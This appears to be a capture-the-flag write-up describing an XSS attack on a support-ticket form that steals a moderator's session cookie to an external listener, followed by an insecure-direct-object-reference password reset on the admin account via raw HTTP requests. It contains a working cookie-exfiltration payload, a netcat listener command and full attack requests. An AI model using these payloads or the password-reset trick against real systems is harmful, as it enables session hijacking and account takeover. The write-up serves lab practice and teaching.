Initial foothold

XSS injection in the support ticket submit form to steal the moderator's cookie:

Set up a listener on a public server:

nc -nlvp 8080

Submit this payload on the support ticket form:

<img src=x onerror="this.src='http://51.15.X.Z:8080/?'+document.cookie; this.removeAttribute('onerror');">

In Burp Repeater, changed the moderator's password using the stolen session cookie:

POST /api/users/update HTTP/1.1
Host: 68.183.37.6:32165
Content-Length: 32
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://68.183.37.6:32165
Referer: http://68.183.37.6:32165/settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI3ODYyNTh9.khh1AmDJ8UNKCRieovxmWvVFmMIEhOGdW5dOwCd25mQ
Connection: close
{"password":"test123","uid":"100"}

Admin login

No flag with moderator access, so tried different "uid" values. Found uid=1 for admin, reset its password the same way, and logged in with the new password:

POST /api/users/update HTTP/1.1
Host: 68.183.37.6:32165
Content-Length: 32
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://68.183.37.6:32165
Referer: http://68.183.37.6:32165/settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI3ODYyNTh9.khh1AmDJ8UNKCRieovxmWvVFmMIEhOGdW5dOwCd25mQ
Connection: close
{"password":"test123","uid":"1"}

Log in with the new credentials admin:test123.
